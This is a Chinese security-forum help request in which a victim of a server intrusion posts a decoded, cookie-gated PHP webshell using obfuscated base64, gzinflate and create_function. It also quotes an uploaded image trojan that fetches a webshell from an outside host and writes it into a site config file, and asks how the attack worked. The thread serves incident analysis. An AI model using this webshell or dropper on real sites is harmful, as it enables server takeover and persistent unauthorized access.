-
-
[已解决]
[求助] 服务器被入侵有日志这些求入侵过程
300.00雪花
-
发表于:
2020-8-25 18:11
2813
-
[已解决] [求助] 服务器被入侵有日志这些求入侵过程
300.00雪花
<?php
/* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */
?><?php
/* -- mzphp 混淆加密:https://git.oschina.net/mz/mzphp2 */
error_reporting(E_ALL ^ E_NOTICE);
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0);
header('content-Type: text/html; charset=gb2312');
if (isset($_COOKIE['PHPSSESID']) == !1) {
exit;
}
$c = 'ch' . 'r';
$b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101);
$r = $b('cHJlZ19yZXBsYWNl');
$f = $b('Y3JlYXRlX2Z1bmN0aW9u');
if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) {
$html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7');
$e = @$f('', $r('/#html/', '', $html));
$e();
} else {
$html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7');
$e = @$f('', $r('/#html/', '', $html));
$e();
}
exit;
这是小马解密过的,需要cookie才能访问
通过论坛老哥分析是通过ueditor编辑器插件上传的jpg图片马,
http://1.142ozgx.cn/Public/static/ueditor/这是编辑器地址,确实可以上传图片马,但是他是怎么解析的喃?
<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>
这是图片马的内容,把webshell写入到文件夹了
最主要的一个问题他是怎么解析的这个图片?
怎么执行的?
来个老哥分析下过程
https://wwa.lanzous.com/ic2Xsfyqwuh 日志文件和木马都在里面
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2020-8-27 14:16
被漠北蝈蝈编辑
,原因: